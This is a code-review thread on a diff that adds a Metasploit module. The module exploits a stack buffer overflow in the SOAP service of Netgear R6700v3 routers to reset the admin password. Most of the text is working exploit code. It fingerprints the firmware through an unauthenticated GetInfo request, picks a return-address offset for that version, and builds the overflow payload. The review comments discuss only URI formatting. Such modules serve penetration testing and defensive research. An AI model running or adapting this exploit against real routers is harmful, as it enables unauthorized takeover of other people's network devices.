modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb

```diff
@@ -0,0 +1,168 @@
+    "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
+    "\r\n<SOAP-ENV:Body>"\
+    "\r\nSetDeviceNameIconByMAC"\
+    "\r\n<NewBlockSiteName>1"\
+    "\r\n</NewBlockSiteName>"\
+    "\r\n</SOAP-ENV:Body>"\
+    "\r\n</SOAP-ENV:Envelope>"
+
+    # the GetInfo method will helpfully report the firmware version to an unauth request
+    headers = "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"
+
+    res = send_request_cgi({
+      'uri' => 'soap/server_sa HTTP/1.1',
+      'method'  => 'POST',
+      'raw_headers'  => headers,
+      'data'  => soap
+    })
+
+    fail_with(Failure::Unknown, 'Failed to obtain DeviceInfo:1#GetInfo') unless res && res.code == 200
+
+    if res.body.to_s =~ /V1.0.4.84/
+      print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.")
+      # this offset is where execution will jump to
+      # a part in the middle of the binary that resets the admin password
+      return "\x58\x9a\x03"
+    elsif res.body.to_s =~ /V1.0.4.82/
+      print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.")
+      return "\x48\x9a\x03"
+    end
+  end
+
+  def check
+    if get_offset
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def run
+    offset = get_offset
+    if not offset
+      fail_with(Failure::Unknown, "Unknown firmware version, can't proceed")
+    end
+
+    if not offset
+      fail_with(Failure::Unknown, 'Failed to obtain target version')
+    end
+
+    headers =
+    "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever"
+
+    payload =
+    "<?xml version=\"1.0\"?>"\
+    "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
+    "\r\n<SOAP-ENV:Body>"\
+    "\r\nSetDeviceNameIconByMAC"\
+    "\r\n<NewBlockSiteName>1"
+
+    # filler
+    payload += Rex::Text::rand_text_alpha(1028)
+    # $r4
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r5
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r6
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r7
+    payload += Rex::Text::rand_text_alpha(4)
+    # $r8
+    payload += Rex::Text::rand_text_alpha(4)
+    # $lr (AKA return address)
+    payload += offset
+
+    # trailer
+    payload +=
+    "\r\n</NewBlockSiteName>"\
+    "\r\n</SOAP-ENV:Body>"\
+    "\r\n</SOAP-ENV:Envelope>"
+
+    headers.gsub! "\n", "\r\n"
+    payload.gsub! "\n", "\r\n"
+
+    # MSF adds content len automatically.
+    # Unfortunately this appears before the raw headers hash, but doesn't appear to have ill effects
+    headers += "\r\n"
+
+    res = send_request_cgi({
+      'uri' => 'soap/server_sa HTTP/1.1',
```

Comment:
`HTTP/1.1` shouldn't be required here. Also, the path should begin with `/`.

Reply:
same as above

Reply:
regarding HTTP/1.1, I think we added this because it was sending /1.0 be default? @rdomanski can you confirm?

Reply:
Marking this as resolved as I have confirmed this is now fixed and @bcoles original issue has been addressed as he requested.